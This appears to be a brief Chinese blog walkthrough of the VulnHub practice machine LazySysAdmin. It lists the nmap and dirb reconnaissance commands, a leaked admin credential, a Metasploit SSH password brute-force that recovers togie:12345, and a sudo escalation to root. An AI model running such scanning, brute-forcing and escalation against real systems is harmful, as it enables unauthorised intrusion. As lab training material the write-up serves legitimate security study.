vulnhub--LazySysAdmin

主机发现

netdiscover -r 192.168.85.0

端口扫描

root:~/ # nmap -sV -p- 192.168.85.130

curl -I 192.168.85.130

dirb http://192.168.85.130 /usr/share/wordlists/dirb/common.txt -o /root/result.txt

cat /root/result.txt | grep "^+"

 

 

 

 

Admin TogieMYSQL12345^^

ssh弱口令爆破:

root@kali~ msfconsole

msf5 > use auxiliary/scanner/ssh/ssh_login

msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.85.130

rhosts => 192.168.85.130

msf5 auxiliary(scanner/ssh/ssh_login) > set user_file /root/user.txt

user_file => /root/user.txt

msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/password.txt

pass_file => /root/password.txt

msf5 auxiliary(scanner/ssh/ssh_login) > exploit

 

[+] 192.168.85.130:22 - Success: 'togie:12345' ''

 

togie@LazySysAdmin:~$ sudo su root

root@LazySysAdmin:/home/togie# whoami

root

参考

https://blog.csdn.net/qq_42180996/article/details/89520567

https://www.cnblogs.com/yuzly/p/10800861.html

https://www.freebuf.com/sectool/174663.html

posted @ 2020-02-12 10:38  JKding233  阅读(308)  评论(0)    收藏  举报